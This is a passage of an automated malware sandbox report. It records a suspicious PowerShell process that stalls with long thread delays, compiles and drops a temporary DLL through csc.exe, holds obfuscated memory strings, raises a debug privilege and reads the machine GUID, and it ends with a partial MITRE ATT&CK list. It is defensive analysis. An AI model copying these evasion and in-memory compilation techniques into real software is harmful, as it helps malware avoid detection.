    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4166
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5657
    Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 588
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4020 | Thread sleep time: -14757395258967632s >= -30000s
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wVmBbPiVATyasIgjQjvfmfvuAnfHkvJexfMVrlqwolMlxOTkLSwHsNghgaloIPrwkgyyEaKVlAYkxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugq
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wyOEFfgIBueTlLcRlMxSybqddEdejeaWfuOUUraBIcSHtjLysMNPgtVlsXWsrBybCPEbfygSVuWlwIGMuxzxWjDMYyjHqaPORvgcqEMuncCfBKiFAhLjRkDT
    Source: ModuleAnalysisCache.0.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wwIGMuxzxWjDMYyjHqaPORvgcqEMuncCfBKiFAhLjRkDTWivCqHECEcGrqWDaWjBdsSDXlyZaEPrCJBoCimnIpcVtKaYBfRUkVORetKwlPKNANIoiLCSDGma
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wvCsbicoFBBevMciLqnDXZPTJDpnsYLFmTJgnFmkRMmrssAcHQbpwfUmgIjIrWsOLwcHqSocRhDtqAzDiuijcpCRkHSBbAiJWNFdJQWoqUGAWKPgQcQjzdzr
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugqXQRedYRFvuAtZEVqXkhAeegnlexqkwXwSuIwPJzzwwwOhdbObBVNMvydAMAzCtSYFAAGfoGeTgQ
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wPTJaDWAUeIOQdNXRjeQnXAwTTqzLeyabdymdyIiiAsyDLOWXbDpVDEKwQcAsyFyduqCbkcloPrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLC
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wtKAUNhJPdfRIqluSzTyHxSZtOyVNDYqTBljtrqxTiqeSNdhzzwMbmpGUlRSbVmcIkyrKagaTwBmaOATzTqfvohUhNCqrjkgBPfmiNtXhZsYIVsQKHOlyaNr
    Source: ModuleAnalysisCache.0.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wwDWPUbkzYNAtizAWSiIGtOTFvSraPEIxlWPWqvLCrPAlwAGprGrybWUrTbZcxUxIRFFNaEvKmTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenI
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: weBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkjrVNZCVmNFGWhVNVupZyyqeZtEZyxZZOPNxZnCLlnlRriMuHylblVbuxUPiipuhmehfIZZTUdNfw
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wNdhzzwMbmpGUlRSbVmcIkyrKagaTwBmaOATzTqfvohUhNCqrjkgBPfmiNtXhZsYIVsQKHOlyaNrZTTYdXHYgtyFaBoOjepDzzkBAGWAtRGAHrPbcljfmvLV
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wJjVemwrdrdzGJxhtAqtdUOBpIDLrALQRwRlpzoakOpQaqDfknPDRFIKBOgXKGXmpIkcFKCwmWUeeBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkj
    Source: powershell.exe, 00000000.00000002.2806803037.000001B2B4554000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wJbglpYmoYIwASoKyXGRoKcihJXQBvgwKdqQihUZFLEESAcLtxsVoSsMvfHewvckjGkFkmFLOmVlIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQ
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQzOmglXXQHFPyauAwvDwtHuSIRjlXQcRrWfOxMdWgDjXuVTdMURZuMzzVQnLfLSmITIbTiuUVLvz
    Source: ModuleAnalysisCache.0.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wwAGprGrybWUrTbZcxUxIRFFNaEvKmTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenIQVhvlzXNDfzoSRgSOGmLaSLQrwuSXeCgjvnWojFeRGWB
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wLOWXbDpVDEKwQcAsyFyduqCbkcloPrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLClJYjmGxSkrIoEMizPuqperbXCIEdWnmEaMloKmqnLUpJ
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wHdEtoFQMEZQVTeCXISgeBCCELijddizqGSrHpdPbUFWQvCsbicoFBBevMciLqnDXZPTJDpnsYLFmTJgnFmkRMmrssAcHQbpwfUmgIjIrWsOLwcHqSocRhDt
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 identical entries)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 identical entries)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    MITRE ATT&CK Matrix (a number in parentheses is the count of matched signatures for that technique)
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
